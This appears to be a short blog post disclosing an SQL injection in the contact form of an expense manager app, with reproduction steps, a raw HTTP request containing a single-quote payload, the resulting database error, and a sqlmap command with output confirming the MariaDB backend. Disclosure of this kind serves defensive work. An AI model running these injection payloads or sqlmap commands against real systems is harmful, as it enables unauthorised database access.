Description
- INSERT INTO SQL injection found in contact.php page
- SQLMap used to do automation
INSERT INTO SQL Injection
Steps to Reproduce:
- Visit contact us page
- Add word to e.g. "test" to "Message" parameter
- Place single quote to trigger the SQL injection error
- Automate the process using SQLMap
// HTTP POST request
POST /expensemanager/contact.php HTTP/1.1
Host: 192.168.166.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36
[...]
Name=test&Email=test%40test.test&Subject=tesst&Message=test%27%0D%0A
// HTTP response
HTTP/1.1 200 OK
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
[...]
[...]
<br />
<b>Fatal error</b>: Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '')' at line 2 in C:\xampp\htdocs\expensemanager\contact.php:21
Stack trace:
#0 C:\xampp\htdocs\expensemanager\contact.php(21): mysqli_query(Object(mysqli), 'INSERT INTO fee...')
#1 {main}
thrown in <b>C:\xampp\htdocs\expensemanager\contact.php</b> on line <b>21</b><br />
[...]
// SQLMap in action
sqlmap --dbms=mysql --threads 10 -r request.txt --level 5 --risk 3 --banner
[...]
[23:13:30] [INFO] testing MySQL
[23:13:30] [INFO] confirming MySQL
[23:13:30] [INFO] the back-end DBMS is MySQL
[23:13:30] [INFO] fetching banner
[23:13:30] [INFO] resumed: '10.4.32-MariaDB'
web application technology: Apache 2.4.58, PHP 8.2.12
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.4.32-MariaDB'
[...]
Conclusion
- Had lots of fun fuzzing the application
- Until next Friday!
- Cheers
Can you link to the vendor please?
ReplyDeleteHey VulnDB,
ReplyDeleteIts an app that I found on Github, however I dont have the link. Sorry!